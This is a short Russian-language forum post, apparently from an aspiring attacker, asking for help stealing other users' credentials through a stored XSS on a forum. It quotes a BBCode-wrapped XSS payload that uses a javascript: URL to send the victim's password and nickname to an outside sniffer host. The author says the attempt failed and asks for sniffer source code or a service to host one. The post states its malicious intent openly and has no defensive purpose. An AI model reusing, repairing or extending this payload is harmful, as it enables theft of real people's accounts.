Я не умею пользоваться XSS, я вообще не знаю Java Script, мне нужно что б жертва просто прошла по ссылке, я ее туда просто заманю. Я хотел истользовать активную XSS, но у меня не вышло почему-то. Она видна другим пользователям. Я вот такое отправил:

[font color=[img src=http://s.netsec.ru/s.gif/style=display:none;background:url(javascript:docum ent.images[1].src="http://s.netsec.ru//s.gif?id=79 &"+pass+nick); ]][/font]

но видимо не судьба етому свершиться, да еще и сниффер на s.netsec.ru почему-то у меня не открываеться, все время мне 404 выбивает. Так что мож кто исходники даст на такой сниффер или даст ссылку где можна такую фишку зарегить?